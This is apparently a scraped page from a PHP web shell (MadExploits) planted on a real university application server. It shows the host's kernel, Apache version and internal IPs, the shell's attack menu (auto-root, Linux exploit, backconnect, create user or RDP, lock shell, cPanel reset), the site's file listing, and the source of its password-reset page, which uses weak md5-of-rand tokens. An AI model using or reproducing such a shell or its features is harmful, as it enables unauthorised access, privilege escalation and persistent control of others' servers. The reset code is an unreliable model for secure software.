Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
applications /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
mailer-old
[ DIR ]
drwxr-xr-x
phpmailer_manual_setup
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxrwxr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user-ankittill30725.php
5.29
KB
-rw-r--r--
class.user.php
5.9
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
282
B
-rw-r--r--
dashboard.php
5.13
KB
-rw-r--r--
dbconfig.php
1.29
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
4.94
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
index.php
5.86
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.34
KB
-rw-r--r--
personalInformations-oldofcsed...
24.15
KB
-rw-r--r--
personalInformations.php
1
KB
-rw-r--r--
register-ankittill30725.php
16.12
KB
-rw-r--r--
register-nandini.php
14.88
KB
-rw-r--r--
register-originaltill29725.php
16.71
KB
-rw-r--r--
register.php
15.72
KB
-rw-r--r--
registrationVerify.php
2.46
KB
-rw-r--r--
resetpass.php
5.26
KB
-rw-r--r--
test-error.php
430
B
-rw-r--r--
testmail1.php
1.1
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.6
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : forgotPassword.php
<?php session_start(); require_once 'class.user.php'; $user = new USER(); if($user->is_logged_in()!="") { $user->redirect('dashboard.php'); } if(isset($_POST['btn-submit'])) { $email = $_POST['txtemail']; $stmt = $user->runQuery("SELECT studentID FROM studentregistration WHERE studentEmail=:email LIMIT 1"); $stmt->execute(array(":email"=>$email)); $row = $stmt->fetch(PDO::FETCH_ASSOC); if($stmt->rowCount() == 1) { $id = base64_encode($row['studentID']); $code = md5(uniqid(rand())); $stmt = $user->runQuery("UPDATE studentregistration SET tokenCode=:token WHERE studentEmail=:email"); $stmt->execute(array(":token"=>$code,"email"=>$email)); $message= " Dear, $email <br /> We received your request to reset the password, just click the following link to reset your password, if not just ignore this email, <br /><br /> <a href='https://cipd.iiitd.ac.in/applications/resetpass.php?id=$id&code=$code'>Click here to reset your password</a> <br /><br /> Thank You "; $subject = "Password Reset"; $user->send_mail($email,$message,$subject); $msg = "<div class='alert alert-success'> <button class='close' data-dismiss='alert'>×</button> We've sent an email to $email. Please click on the password reset link in the email to generate new password. </div>"; } else { $msg = "<div class='alert alert-danger'> <button class='close' data-dismiss='alert'>×</button> <strong>Sorry!</strong> this email not found. </div>"; } } ?> <!DOCTYPE html> <html> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Intelligent Product Development - Certification Program (iPD-CP), IIIT-Delhi | Forgot Password</title> <!-- Tell the browser to be responsive to screen width --> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <!-- Bootstrap 3.3.7 --> <link rel="stylesheet" href="bower_components/bootstrap/dist/css/bootstrap.min.css"> <!-- Font Awesome --> <link rel="stylesheet" href="bower_components/font-awesome/css/font-awesome.min.css"> <!-- Ionicons --> <link rel="stylesheet" href="bower_components/Ionicons/css/ionicons.min.css"> <!-- Theme style --> <link rel="stylesheet" href="dist/css/AdminLTE.min.css"> <!-- iCheck --> <link rel="stylesheet" href="plugins/iCheck/square/blue.css"> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> <!-- Google Font --> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic"> </head> <body class="hold-transition login-page"> <div class="login-box"> <div class="login-logo"> <a href="index.php" style="color:#FFFFFF;"><strong>Intelligent Product Development - Certification Program (iPD-CP), IIIT-Delhi</strong></a> </div> <!-- /.login-logo --> <div class="login-box-body"> <p class="login-box-msg">Forgot Password</p> <form class="form-signin" method="post"> <?php if(isset($msg)) { echo $msg; } else { ?> <div class='alert alert-info'> Please enter your email address. You will receive a link to create a new password via email.! </div> <?php } ?> <div class="form-group has-feedback"> <input type="email" class="form-control" placeholder="Email" name="txtemail" required > <span class="glyphicon glyphicon-envelope form-control-feedback"></span> </div> <div class="row"> <div class="col-xs-8"> <button type="submit" class="btn btn-primary btn-block btn-flat" name="btn-submit">Generate new Password</button> </div> <!-- /.col --> <div class="col-xs-4"> <a href="index.php" class="btn btn-primary btn-block btn-flat">Sign In</a> </div> <!-- /.col --> </div> </form> <!-- /.login-box-body --> </div> <!-- /.login-box --> <!-- jQuery 3 --> <script src="bower_components/jquery/dist/jquery.min.js"></script> <!-- Bootstrap 3.3.7 --> <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- iCheck --> <script src="plugins/iCheck/icheck.min.js"></script> <script> $(function () { $('input').iCheck({ checkboxClass: 'icheckbox_square-blue', radioClass: 'iradio_square-blue', increaseArea: '20%' /* optional */ }); }); </script> </body> </html>
Close